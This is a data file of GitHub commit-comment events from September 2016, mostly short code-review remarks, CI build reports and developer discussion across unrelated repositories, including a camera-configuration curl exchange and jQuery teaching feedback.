{"id":"4586863360","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-lib-monitor"},"payload":{"comment":{"id":19088479,"position":null,"line":null,"path":null,"commit_id":"922b6fe044eb714070708a3b0db138ec893944e0","created_at":"2016-09-20T01:01:20Z","updated_at":"2016-09-20T01:01:20Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dohnY1rtQQm_9Sb4DQgHEQ"}},"created_at":"2016-09-20T01:01:20Z"}
{"id":"4586867546","type":"CommitCommentEvent","actor":{"login":"khingblue"},"repo":{"name":"warrenfalk/protobuf"},"payload":{"comment":{"id":19088511,"position":null,"line":null,"path":null,"commit_id":"4a959f799f24bbd01cf823f7230bc2683537f621","created_at":"2016-09-20T01:02:42Z","updated_at":"2016-09-20T01:02:42Z","body":"@warrenfalk  fyi, I uses gdb to step into the function and found that it's causing dead lock in descriptor.cc:\r\n\r\n    const FileDescriptor* DescriptorPool::FindFileByName(const string& name) const\r\n\r\nI'll continue to check if I can fix it."}},"created_at":"2016-09-20T01:02:42Z"}
{"id":"4586869525","type":"CommitCommentEvent","actor":{"login":"umayanga123"},"repo":{"name":"umayanga123/scpp_android_node"},"payload":{"comment":{"id":19088523,"position":null,"line":null,"path":null,"commit_id":"5d5f9d1356b71b7c88ff70dddbf1c025e44d639b","created_at":"2016-09-20T01:03:21Z","updated_at":"2016-09-20T01:03:21Z","body":"@coinRate is $ . not rs."}},"created_at":"2016-09-20T01:03:21Z"}
{"id":"4586869965","type":"CommitCommentEvent","actor":{"login":"djres88"},"repo":{"name":"indutny/asn1.js"},"payload":{"comment":{"id":19088526,"position":2,"line":2,"path":".npmignore","commit_id":"c5babeae351faac64ecaaad56cd11f9c4e86c131","created_at":"2016-09-20T01:03:30Z","updated_at":"2016-09-20T01:03:30Z","body":"Think this might be the issue."}},"created_at":"2016-09-20T01:03:30Z"}
{"id":"4586876385","type":"CommitCommentEvent","actor":{"login":"blakejohnson"},"repo":{"name":"BBN-Q/QuantumTomography.jl"},"payload":{"comment":{"id":19088567,"position":null,"line":null,"path":null,"commit_id":"0505795fde051a08fb889c7295891785b1a220a9","created_at":"2016-09-20T01:05:23Z","updated_at":"2016-09-20T01:05:23Z","body":"Accidental commit of `.travis.yml~`."}},"created_at":"2016-09-20T01:05:23Z"}
{"id":"4586876781","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/jQueryAndFizzBuzz"},"payload":{"comment":{"id":19088572,"position":6,"line":6,"path":"assignment.html","commit_id":"90a7636d0997a2e45fdfd452299980960583a3fd","created_at":"2016-09-20T01:05:31Z","updated_at":"2016-09-20T01:05:31Z","body":"読み込まなくても動きます。\r\nWebサイトをつくるとき、外部サイトからファイルを読み取ると速度の低下につながるので、本当にそのライブラリが必要なのかを理解して使う必要があるので気をつけましょう。\r\n\r\nちなみにjQueryはDOM操作(今回やったような操作)、jQueryUIはjQueryを使った汎用的なUIパーツを提供するライブラリです。\r\nhttp://alphasis.info/jquery-ui/"}},"created_at":"2016-09-20T01:05:31Z"}
{"id":"4586879198","type":"CommitCommentEvent","actor":{"login":"bimakileng"},"repo":{"name":"bimakileng/Rails"},"payload":{"comment":{"id":19088590,"position":null,"line":null,"path":null,"commit_id":"3623b1f94562b8208d2a7fcf0779c464497ad14c","created_at":"2016-09-20T01:06:22Z","updated_at":"2016-09-20T01:06:22Z","body":"\r\n\r\n[ch03.txt](https://github.com/bimakileng/Rails/files/481423/ch03.txt)\r\n\r\n"}},"created_at":"2016-09-20T01:06:22Z"}
{"id":"4586880410","type":"CommitCommentEvent","actor":{"login":"bimakileng"},"repo":{"name":"bimakileng/Rails"},"payload":{"comment":{"id":19088604,"position":null,"line":null,"path":null,"commit_id":"3623b1f94562b8208d2a7fcf0779c464497ad14c","created_at":"2016-09-20T01:06:48Z","updated_at":"2016-09-20T01:06:48Z","body":"Rails exercises"}},"created_at":"2016-09-20T01:06:48Z"}
{"id":"4586886709","type":"CommitCommentEvent","actor":{"login":"jakesyl"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":19088641,"position":null,"line":null,"path":null,"commit_id":"63129112bbea91f7cd62014f162f857f50084656","created_at":"2016-09-20T01:08:56Z","updated_at":"2016-09-20T01:08:56Z","body":"Is there any point to this?"}},"created_at":"2016-09-20T01:08:56Z"}
{"id":"4586889019","type":"CommitCommentEvent","actor":{"login":"ericlavigne"},"repo":{"name":"ericlavigne/gomoku"},"payload":{"comment":{"id":19088657,"position":null,"line":null,"path":null,"commit_id":"18e1e6d74dc752047e3e3952a0365e5921e6dd09","created_at":"2016-09-20T01:09:50Z","updated_at":"2016-09-20T01:09:50Z","body":"Of course! Hit that \"fork\" button and let me know when you have some changes to merge back in.\r\n\r\nOur next enhancement was either an \"epsilon greedy\" computer player or a terminal user interface. Feel free to give either of those a try.\r\n\r\nI was also thinking that the current user interface could use some improvements, such as a way to select which computer player to use, or supporting connect4 in addition to tic-tac-toe.\r\n\r\nIf you want to contribute changes back, keep in mind that this project was meant to be more of a learning environment than anything else. Notice that there are several separate user interfaces for the same thing, to show a gradual progression of how user interfaces can be developed. Any further user interfaces should follow the same pattern by adding a new tab instead of changing an older tab. Similar issue with the AI parts - better to create a new file with a new strategy instead of improving an older file."}},"created_at":"2016-09-20T01:09:50Z"}
{"id":"4586892651","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19088667,"position":null,"line":null,"path":null,"commit_id":"22c4a04f5e4e54d66cb51f00a286a6f412468fd0","created_at":"2016-09-20T01:11:07Z","updated_at":"2016-09-20T01:11:07Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2371 of 2372 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T01:11:07Z"}
{"id":"4586895219","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19088679,"position":null,"line":null,"path":null,"commit_id":"22c4a04f5e4e54d66cb51f00a286a6f412468fd0","created_at":"2016-09-20T01:12:00Z","updated_at":"2016-09-20T01:12:00Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T01:12:00Z"}
{"id":"4586897776","type":"CommitCommentEvent","actor":{"login":"music-addict"},"repo":{"name":"music-addict/upgraded-spork"},"payload":{"comment":{"id":19088699,"position":null,"line":null,"path":null,"commit_id":"216bd5d737eb95da5b3ca9254b0fd069518417e1","created_at":"2016-09-20T01:12:54Z","updated_at":"2016-09-20T01:12:54Z","body":"Commenting on a commit."}},"created_at":"2016-09-20T01:12:54Z"}
{"id":"4586899061","type":"CommitCommentEvent","actor":{"login":"tyler-sassaman"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19088704,"position":null,"line":null,"path":null,"commit_id":"7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1","created_at":"2016-09-20T01:13:20Z","updated_at":"2016-09-20T01:13:20Z","body":"I am really lost in the documentation. I think we can add the function\ncall to process_reply() method from the read_board(). THen all we have to\ndo to finish the server is send the http reply?\n\n\n> client side might pretty simple, if anyone wants to read up to help\n> understand how to incorporate the rest of the program here is a link to\n> some docs\n> https://docs.python.org/2/library/httplib.html\n>\n> The server side may be a little more tricky, it is using simpleHTTPServer\n> https://docs.python.org/2/library/simplehttpserver.html\n>\n>\n>\n> On Mon, Sep 19, 2016 at 6:25 PM, David Schwehr <dpschwehr@gmail.com>\n> wrote:\n>\n>> need to finish http stuff which I am working on now, need to do html\n>> part\n>> to display board(could be done last or if someone wants to do it now) ,\n>> and\n>> need to maintain a txt file for the board on the client side. I should\n>> be\n>> able to get the http stuff done, if not I may ask for help. I am not\n>> sure\n>> how to control the work flow on the server, it starts a server\n>> connection\n>> but the methods are never called. Before the socket stuff had to be in\n>> an\n>> infinite loop and the methods were called as needed. Now the http server\n>> 'serves forever' and that is the end of main. We may have to incorporate\n>> the method calls from the http part, not sure yet, I am reading the docs\n>> for the simpleHTTPServe library now.\n>>\n>> On Mon, Sep 19, 2016 at 6:18 PM, tyler-sassaman\n>> <notifications@github.com>\n>> wrote:\n>>\n>>> So what is left to be done?\n>>>\n>>> —\n>>> You are receiving this because you authored the thread.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/dssquared/Networks_Lab1/commit/7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1#commitcomment-19088026>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AE8DGyWq35fzEmt-EUiDbTtH_uWp3U2qks5qryZggaJpZM4KBGav>\n>>> .\n>>>\n>>\n>>\n>\n>\n> --\n> You are receiving this because you commented.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/dssquared/Networks_Lab1/commit/7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1#commitcomment-19088138\n\n\n-- \nTYLER SASSAMAN\nUndergraduate\nMontana State University\nComputer Science Dept.\n\n"}},"created_at":"2016-09-20T01:13:20Z"}
{"id":"4586900708","type":"CommitCommentEvent","actor":{"login":"anish006"},"repo":{"name":"SolutionShare/SolutionShare"},"payload":{"comment":{"id":19088710,"position":null,"line":null,"path":null,"commit_id":"01dc7785f1f0af7f6e1503f89efe622b61d03316","created_at":"2016-09-20T01:13:52Z","updated_at":"2016-09-20T01:13:52Z","body":"test_(alex)"}},"created_at":"2016-09-20T01:13:52Z"}
{"id":"4586904856","type":"CommitCommentEvent","actor":{"login":"jessijean"},"repo":{"name":"holger1411/understrap"},"payload":{"comment":{"id":19088737,"position":null,"line":null,"path":null,"commit_id":"e1ba1b12b2e14881ebde57f073684340bc174a12","created_at":"2016-09-20T01:15:16Z","updated_at":"2016-09-20T01:15:16Z","body":"@holger1411  Shoot. I didn't mean to add that header.php change with this commit, fixed it and sent a new pull request with the finished header.php code. :see_no_evil:"}},"created_at":"2016-09-20T01:15:16Z"}
{"id":"4586905070","type":"CommitCommentEvent","actor":{"login":"marcralew"},"repo":{"name":"citation-style-language/styles"},"payload":{"comment":{"id":19088741,"position":null,"line":null,"path":null,"commit_id":"e17485012a29fda5f890712e963986ddd46f85a7","created_at":"2016-09-20T01:15:20Z","updated_at":"2016-09-20T01:15:20Z","body":"Thank you for the corrections."}},"created_at":"2016-09-20T01:15:20Z"}
{"id":"4586905802","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19088747,"position":null,"line":null,"path":null,"commit_id":"f091781495f2e4d774a8bde8ff35f4e2de6aafa5","created_at":"2016-09-20T01:15:34Z","updated_at":"2016-09-20T01:15:34Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2310 of 2475 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f091781495f2e4d774a8bde8ff35f4e2de6aafa5-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f091781495f2e4d774a8bde8ff35f4e2de6aafa5-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.33%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T01:15:34Z"}
{"id":"4586906049","type":"CommitCommentEvent","actor":{"login":"witgo"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19088748,"position":163,"line":811,"path":"core/src/main/scala/org/apache/spark/storage/memory/MemoryStore.scala","commit_id":"8faa5217b44e8d52eab7eb2d53d0652abaaf43cd","created_at":"2016-09-20T01:15:36Z","updated_at":"2016-09-20T01:15:36Z","body":"OK,I see."}},"created_at":"2016-09-20T01:15:36Z"}
{"id":"4586907461","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/jQueryAndFizzBuzz"},"payload":{"comment":{"id":19088758,"position":1,"line":1,"path":"assignment.js","commit_id":"90a7636d0997a2e45fdfd452299980960583a3fd","created_at":"2016-09-20T01:16:09Z","updated_at":"2016-09-20T01:16:09Z","body":"```\r\nvar fb = function(number) {\r\n```\r\nでは、実行エンジンでは、「無名関数を定時し、変数fbに代入する」とい解釈されてしまいます。\r\n```\r\nfunction fb(n) {\r\n```\r\nとすることで、「関数fbを宣言し、fbで呼び出し可能にする」という意味になります。\r\n\r\n細やかな違いですが、チーム開発では他の人の実装を見てどの関数からどの関数が呼び出されたのかというような流れをみて、何をしているのかを見ることもありますので、\r\n* 関数名の宣言\r\n* わかりやすい変数名・関数名\r\nが重要になってきます。\r\n"}},"created_at":"2016-09-20T01:16:09Z"}
{"id":"4586909123","type":"CommitCommentEvent","actor":{"login":"estadtherr"},"repo":{"name":"estadtherr/Overpass-API"},"payload":{"comment":{"id":19088763,"position":null,"line":null,"path":null,"commit_id":"4374a34881ac5cfc57614b5f5127b987f6981dfe","created_at":"2016-09-20T01:16:42Z","updated_at":"2016-09-20T01:16:42Z","body":"I am currently working on tracking down failures in other test cases:\r\n\r\n- a couple \"around\" cases that don't account for valid node inclusions\r\n- timeout tests in the osm3s_query suite that have inherent race conditions\r\n\r\nI was going to wait to do a PR until I've addressed the other tests, but I could break the fixes up into multiple PRs if that makes more sense for the upstream repository.\r\n\r\nWhat do you think?\r\n"}},"created_at":"2016-09-20T01:16:42Z"}
{"id":"4586909907","type":"CommitCommentEvent","actor":{"login":"DavidKimVungle"},"repo":{"name":"Vungle/iOS-SDK"},"payload":{"comment":{"id":19088768,"position":null,"line":null,"path":null,"commit_id":"be7b0f90000ffb08043fa6df7d84d09bf0fe44d1","created_at":"2016-09-20T01:16:58Z","updated_at":"2016-09-20T01:16:58Z","body":"Looks good!"}},"created_at":"2016-09-20T01:16:58Z"}
{"id":"4586912954","type":"CommitCommentEvent","actor":{"login":"lorkithen"},"repo":{"name":"lorkithen/estudos-mentoria"},"payload":{"comment":{"id":19088791,"position":null,"line":null,"path":null,"commit_id":"703407bd7a9105ae5d529088b9930c3890980f00","created_at":"2016-09-20T01:18:04Z","updated_at":"2016-09-20T01:18:04Z","body":"**Markdown**\r\n===================\r\n\r\n\r\nO *Markdown* é um sistema de formatação aberto que torna sua utilização\r\nmais simples. Ele é visualmente limpo e pode ser convertido em HTML e\r\né usado apenas com os símbolos normais do teclado. \r\nPor outras definições o **Markdown** é uma ferramenta que é utilizada \r\npara converter textos simples em [HTML](https://pt.wikipedia.org/wiki/HTML).\r\n\r\n----------\r\n\r\n\r\nSuper-mãe\r\n-------------\r\n\r\nA super-mãe é dotada de diversos poderes como: \r\n\r\n> - Super audição (ouve qualquer rúido a 10km de distância)\r\n> - Conhecimentos sobre o clima.  (Ela sabe exatamente o  tempo que irá fazer no dia. )\r\n> - Super proteção (libera um escudo capaz de absorver qualquer maldade profanada ao seu protegido)\r\n> - OmbroFofix (__Esse é um de seus poderes mais legais!__) Consegue, *geneticamente* modificar seu ombro para um acolchoado extremamente confortavel para transmitir amor e um ombro amigo ao seu protegido.\r\n\r\nA Super-mãe vem de uma família desunida e separada, o que é consequência da aquisição de seus poderes. De encontro com o Super-Pai seus poderes duplicam e ficam extramente imbatíveis!\r\n\r\n### Atributos (0-5)\r\n\r\n- Força: 3\r\n- Defesa: 5\r\n- Agilidade: 5\r\n- Vitalidade: 4\r\n- Destreza: 4\r\n- Sorte: 3 (*para danos críticos*)\r\n\r\n### Características Visuais\r\n\r\n- Altura: 1,70m\r\n- Cor: Pardo\r\n- Cabelos medianos e escuros com pequenas ondulações\r\n- Estatura: Magro\r\n- Visual: Roupas rasgadas(grunge) e um coque enorme.\r\n"}},"created_at":"2016-09-20T01:18:04Z"}
{"id":"4586919218","type":"CommitCommentEvent","actor":{"login":"bimoQi"},"repo":{"name":"bimoQi/bimo"},"payload":{"comment":{"id":19088823,"position":null,"line":null,"path":null,"commit_id":"d60da4b4494d29210ab9a75880562761ce2e3768","created_at":"2016-09-20T01:20:15Z","updated_at":"2016-09-20T01:20:15Z","body":"echo 'asf';"}},"created_at":"2016-09-20T01:20:15Z"}
{"id":"4586924963","type":"CommitCommentEvent","actor":{"login":"jcmaslan"},"repo":{"name":"CamioCam/rtsp"},"payload":{"comment":{"id":19088851,"position":null,"line":null,"path":null,"commit_id":"323ab0d9da147f10d57e764551c8c37a47e02625","created_at":"2016-09-20T01:22:16Z","updated_at":"2016-09-20T01:22:16Z","body":"Correction, we can use the CGI interface to issue this GET instead that has {{stream}} as input @jhallard \r\n```\r\nGET http://192.168.1.35/form/setStream/?TYPE={{stream}}&ENABLE=1&SIZE=HDSIZE&FRAMERATE=18&H264BITRATE=1536&MPEG4BITRATE=1024&MJPEGQUALITY=50&JPEGQUALITY=90&AUDIOCODEC=AACLC&AUDIOBITRATE=16000&AUTH=1&H264BUFFERSEC=0\r\n```\r\n\r\nWe only need to change stream 0, so no other entries are needed (only need `set_stream_0`)"}},"created_at":"2016-09-20T01:22:16Z"}
{"id":"4586926334","type":"CommitCommentEvent","actor":{"login":"Bogdan-G"},"repo":{"name":"Bogdan-G/EnderCore"},"payload":{"comment":{"id":19088856,"position":null,"line":null,"path":null,"commit_id":"0d28628cb0a90d7063feb62c7d9785103e8129bf","created_at":"2016-09-20T01:22:45Z","updated_at":"2016-09-20T01:22:45Z","body":"т.е. не заполненная модель из-за чего крашило ядро"}},"created_at":"2016-09-20T01:22:45Z"}
{"id":"4586938164","type":"CommitCommentEvent","actor":{"login":"keyurtechy"},"repo":{"name":"keyurtechy/mattercenter"},"payload":{"comment":{"id":19088905,"position":null,"line":null,"path":null,"commit_id":"769f3ede3baecf4bb05f1268adf857c4e5e03681","created_at":"2016-09-20T01:26:54Z","updated_at":"2016-09-20T01:26:54Z","body":"Changes required to make menu fourth option configurable on Home Page."}},"created_at":"2016-09-20T01:26:54Z"}
{"id":"4586942729","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/jQueryAndFizzBuzz"},"payload":{"comment":{"id":19088916,"position":12,"line":12,"path":"assignment.js","commit_id":"90a7636d0997a2e45fdfd452299980960583a3fd","created_at":"2016-09-20T01:28:30Z","updated_at":"2016-09-20T01:28:30Z","body":"```\r\n$(document).ready(function() {\r\n```\r\nの書き方は、\r\n```\r\n$(function() {\r\n```\r\nという書き方でもかけます。\r\n\r\n実際の開発では、後者のような書き方を見かけることが多くあると思いますので、覚えておいてください。"}},"created_at":"2016-09-20T01:28:30Z"}
{"id":"4586942804","type":"CommitCommentEvent","actor":{"login":"hliang"},"repo":{"name":"chapmanb/bcbio-nextgen"},"payload":{"comment":{"id":19088917,"position":20,"line":57,"path":"bcbio/variation/gatkjoint.py","commit_id":"697f13cdc1de35b02be561b0a92be439e54d5a4c","created_at":"2016-09-20T01:28:31Z","updated_at":"2016-09-20T01:28:31Z","body":"In `partition_all(n, list)`, `n` should be \"the (max) number of elements\" in each partition returned.\r\nGiven 160 samples, and `joint_group_size` of 60, It should generate 3 batches, 60 samples in each. But now this code makes 54 batches, 3 samples in each.\r\nMaybe `for i, batch_vrn_files in enumerate(tz.partition_all(min(max_batch, 200), vrn_files)):` would work?"}},"created_at":"2016-09-20T01:28:31Z"}
{"id":"4586947489","type":"CommitCommentEvent","actor":{"login":"jhallard"},"repo":{"name":"CamioCam/rtsp"},"payload":{"comment":{"id":19088925,"position":null,"line":null,"path":null,"commit_id":"323ab0d9da147f10d57e764551c8c37a47e02625","created_at":"2016-09-20T01:30:09Z","updated_at":"2016-09-20T01:30:09Z","body":"did you confirm this works? Here is what I get with curl\r\n\r\n``bash\r\ncurl -u admin:admin http://192.168.1.35/form/setStream/?TYPE=0&ENABLE=1&SIZE=HDSIZE&FRAMERATE=20&H264BITRATE=1536&MPEG4BITRATE=1024&MJPEGQUALITY=50&JPEGQUALITY=90&AUDIOCODEC=AACLC&AUDIOBITRATE=16000&AUTH=1&H264BUFFERSEC=0\r\n[1] 26982\r\n[2] 26983\r\n[3] 26984\r\n[4] 26985\r\n[5] 26986\r\n[6] 26987\r\n[7] 26988\r\n[8] 26989\r\n[9] 26990\r\n[10] 26991\r\n[11] 26992\r\n[2]   Done                    ENABLE=1\r\n[3]   Done                    SIZE=HDSIZE\r\n[4]   Done                    FRAMERATE=20\r\n[5]   Done                    H264BITRATE=1536\r\n[6]   Done                    MPEG4BITRATE=1024\r\n[7]   Done                    MJPEGQUALITY=50\r\n[8]   Done                    JPEGQUALITY=90\r\n[9]   Done                    AUDIOCODEC=AACLC\r\n[10]-  Done                    AUDIOBITRATE=16000\r\n[11]+  Done                    AUTH=1\r\n\r\njohn@Carters-MacBook-Pro-2: ~/cam-firmware/cam   (john-dev)\r\n$ 100 Fail\r\n\r\n[1]+  Done                    curl -u admin:admin http://192.168.1.35/form/setStream/?TYPE=0\r\n```\r\n\r\nIt looks okay at first but that `100 Fail` makes me think it didn't work"}},"created_at":"2016-09-20T01:30:09Z"}
{"id":"4586948436","type":"CommitCommentEvent","actor":{"login":"mfcaa1230"},"repo":{"name":"veryyoung/WechatLuckyMoney"},"payload":{"comment":{"id":19088930,"position":null,"line":null,"path":null,"commit_id":"83f5bf698de5af9bb58e1212b47f11f5799640b9","created_at":"2016-09-20T01:30:27Z","updated_at":"2016-09-20T01:30:27Z","body":"李"}},"created_at":"2016-09-20T01:30:27Z"}
{"id":"4586949153","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/jQueryAndFizzBuzz"},"payload":{"comment":{"id":19088931,"position":null,"line":null,"path":null,"commit_id":"90a7636d0997a2e45fdfd452299980960583a3fd","created_at":"2016-09-20T01:30:42Z","updated_at":"2016-09-20T01:30:42Z","body":"シングルクォーテーションとダブルクオーテーションが混ざっているようですので、意味がない場合はできるだけ統一していきましょう。"}},"created_at":"2016-09-20T01:30:42Z"}
{"id":"4586961081","type":"CommitCommentEvent","actor":{"login":"eilo"},"repo":{"name":"Demonid/Tareas"},"payload":{"comment":{"id":19088944,"position":null,"line":null,"path":null,"commit_id":"f87336eca2a668efa5afda023142fca29d5c3d0b","created_at":"2016-09-20T01:34:53Z","updated_at":"2016-09-20T01:34:53Z","body":"Hola @Demonid ando dando una vuelta a los dos años denuevo por el mundo de la emulación, en el corto tiempo que tengo hoy en dia estoy trabajando un par de ideas que tenia cuando estaba en esto, nada que ver con fixes de cosas del juego sino cosas complementarias o interesantes que queria hacer y nunca tuve tiempo por andar fixeando lo que andaba bug xd de vez en cuando escribe estare por mi whatsapp por si cualquier cosa, no uso skype desde que deje el servidor y no ando muy conectado tampoco, y bueno mi vida real no me da tiempo para nada de esto ya jaja"}},"created_at":"2016-09-20T01:34:53Z"}
{"id":"4586962631","type":"CommitCommentEvent","actor":{"login":"gsstudios"},"repo":{"name":"gsstudios/Dorimanx-SG2-I9100-Kernel"},"payload":{"comment":{"id":19088948,"position":null,"line":null,"path":null,"commit_id":"2ee6efd6497f4d09626962e1ab7beaa2e8c5b73e","created_at":"2016-09-20T01:35:25Z","updated_at":"2016-09-20T01:35:25Z","body":"I'm not quite back into development yet. I'm still pretty busy and there are some commits I want to merge which will take time to rework in preparation of Android N. "}},"created_at":"2016-09-20T01:35:25Z"}
{"id":"4586962688","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"the-tcpdump-group/libpcap"},"payload":{"comment":{"id":19088949,"position":10,"line":1031,"path":"pcap-common.c","commit_id":"21ab5f1175655f1bb523764c7d70bc94c1e651b1","created_at":"2016-09-20T01:35:26Z","updated_at":"2016-09-20T01:35:26Z","body":"In https://github.com/the-tcpdump-group/libpcap/commit/53b5b9cb8350679b5b04eb24cbeaf80b756b8289, I saw ``LINKTYPE_MATCHING_MAX`` is changed to 266. Am I understanding it wrong or Shouldn't it be 265? Because ``LINKTYPE_RDS`` (265) is the max value of this type. And ``LINKTYPE_MATCHING_MAX`` defines the max value, so should also be 265?\r\n\r\nAnd in the other file ``pcap/dlt.h`` which I think maps to ``pcap-common.c`` on by one, ``DLT_MATCHING_MAX`` is defined as 265. So I think ``LINKTYPE_MATCHING_MAX`` should also be 265?"}},"created_at":"2016-09-20T01:35:26Z"}
{"id":"4586968313","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19088965,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T01:37:25Z","updated_at":"2016-09-20T01:37:25Z","body":"Okay, I'll take a look on it later!"}},"created_at":"2016-09-20T01:37:25Z"}
{"id":"4586968477","type":"CommitCommentEvent","actor":{"login":"chenchaohan"},"repo":{"name":"chenchaohan/MyFamilyLife"},"payload":{"comment":{"id":19088966,"position":2,"line":2,"path":"README.md","commit_id":"562b55d07c1557e8106d1e011f46c1ac757ce678","created_at":"2016-09-20T01:37:31Z","updated_at":"2016-09-20T01:37:31Z","body":"各位编写完代码提交后，提醒我确认修改"}},"created_at":"2016-09-20T01:37:31Z"}
{"id":"4586971448","type":"CommitCommentEvent","actor":{"login":"NVchengxuyuan"},"repo":{"name":"NVchengxuyuan/ccc"},"payload":{"comment":{"id":19088977,"position":null,"line":null,"path":null,"commit_id":"7aefe046bb0ddc615615d8ff6668960582ac8e94","created_at":"2016-09-20T01:38:33Z","updated_at":"2016-09-20T01:38:33Z","body":"jjjjj"}},"created_at":"2016-09-20T01:38:33Z"}
{"id":"4586974626","type":"CommitCommentEvent","actor":{"login":"guyharris"},"repo":{"name":"the-tcpdump-group/libpcap"},"payload":{"comment":{"id":19088987,"position":10,"line":1031,"path":"pcap-common.c","commit_id":"21ab5f1175655f1bb523764c7d70bc94c1e651b1","created_at":"2016-09-20T01:39:40Z","updated_at":"2016-09-20T01:39:40Z","body":"Typo, fixed in 775cb4802060ff557ecc9bc8ea89efa85345a2a2."}},"created_at":"2016-09-20T01:39:40Z"}
{"id":"4586976831","type":"CommitCommentEvent","actor":{"login":"matwu1006"},"repo":{"name":"NickWu007/Caterpillars-Count-Mobile-2016"},"payload":{"comment":{"id":19088991,"position":null,"line":null,"path":null,"commit_id":"5b323d28319ca3facded23d4eae29977f08cce6c","created_at":"2016-09-20T01:40:25Z","updated_at":"2016-09-20T01:40:25Z","body":"You can create new site, a prompt window will show up and when you delete the site, it will disappear"}},"created_at":"2016-09-20T01:40:25Z"}
{"id":"4586977383","type":"CommitCommentEvent","actor":{"login":"lingfei263"},"repo":{"name":"lingfei263/oais"},"payload":{"comment":{"id":19088992,"position":null,"line":null,"path":null,"commit_id":"c32866a0b16734329b5866b33f306c7ea8e8f98e","created_at":"2016-09-20T01:40:37Z","updated_at":"2016-09-20T01:40:37Z","body":"ss"}},"created_at":"2016-09-20T01:40:37Z"}
{"id":"4586989133","type":"CommitCommentEvent","actor":{"login":"Icenowy"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":19089010,"position":null,"line":null,"path":null,"commit_id":"dce28664f49d91abe39c2eb2977bd39d05cb5ae9","created_at":"2016-09-20T01:44:47Z","updated_at":"2016-09-20T01:44:47Z","body":"maybe it's a change in Nougat...\n2016年9月20日 09:43于 Mingcong Bai <notifications@github.com>写道：\r\n\r\n\r\n\r\n\r\nandroid-platform-tools: fix install\r\n\r\n- mkbootimg is now a Python script.\r\n- unpackbootimg is not found in these sources, @Icenowy, please investigate.\r\n\r\n-- \r\nYou are receiving this because you were mentioned.\r\nReply to this email directly or view it on GitHub:\r\nhttps://github.com/AOSC-Dev/aosc-os-abbs/commit/dce28664f49d91abe39c2eb2977bd39d05cb5ae9"}},"created_at":"2016-09-20T01:44:47Z"}
{"id":"4586992244","type":"CommitCommentEvent","actor":{"login":"fightinggang"},"repo":{"name":"fightinggang/spring-web"},"payload":{"comment":{"id":19089016,"position":5,"line":90,"path":"src/main/java/com/gang/practice/spring/utils/IdentityCardUtil.java","commit_id":"9a95ffb4e71a27519d92d3fdca14f6ee0e7a58aa","created_at":"2016-09-20T01:45:55Z","updated_at":"2016-09-20T01:45:55Z","body":"for sort"}},"created_at":"2016-09-20T01:45:55Z"}
